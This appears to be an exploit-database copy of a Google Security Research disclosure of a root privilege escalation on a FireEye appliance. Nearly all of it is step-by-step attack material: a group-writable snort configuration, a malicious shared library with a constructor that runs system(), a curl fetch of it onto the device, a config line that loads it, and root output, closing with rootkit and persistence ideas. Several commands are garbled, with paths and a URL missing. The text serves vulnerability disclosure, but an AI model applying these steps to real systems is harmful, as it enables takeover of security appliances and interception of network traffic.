FireEye - Malware Input Processor Privilege Escalation

Type exploitpack
Reporter Google Security Research
Modified 2016-03-28T00:00:00


FireEye - Malware Input Processor Privilege Escalation


The mip user is already quite privileged, capable of accessing sensitive network data. However, as the child process has supplementary gid contents, there is a very simple privilege escalation to root. This is because the snort configuration is writable by that group:

$ ls -l /data/snort/config/snort.conf
-rw-rw-r-- 1 fenet contents 1332 Dec  2 18:02 /data/snort/config/snort.conf

This can be exploited by placing a shared library in a writable directory that is mounted with the “exec” option, and appending a “dynamicengine” directive to the snort configuration.

# mount | grep -v noexec | grep rw 
/dev/sda8 on /var type ext4 (rw,noatime)
/dev/sda11 on /data type ext4 (rw,noatime)
/dev/sda9 on /data/db type ext4 (rw,noatime,barrier=0)
tmpfs on /dev/shm type tmpfs (rw)

It looks like /dev/shm is a good candidate for storing a shared library.

First, I create and compile a shared library on my workstation, as there is no compiler available on the FireEye appliance:

$ cat test.c 
void __attribute__((constructor)) init(void)
        system("/usr/bin/id > /tmp/output.txt");
$ gcc test.c -shared -s -fPIC -o

Now fetch that object on the FireEye machine, and instruct snort to load it:

fireeye$ curl > /dev/shm/
fireeye$ printf “dynamicengine /dev/shm/\n” >> /data/snort/config/snort.conf

The snort process is regularly restarted to process new rules, so simply wait for the snort process to respawn, and verify we were able to execute commands as root:

fireeye$ cat /tmp/output.txt                                                           
uid=0(admin) gid=0(root) groups=0(root)

And now we’re root, with complete control of the FireEye machine. We can load a rootkit, persist across reboots or factory resets, inspect or modify traffic, or perform any other action.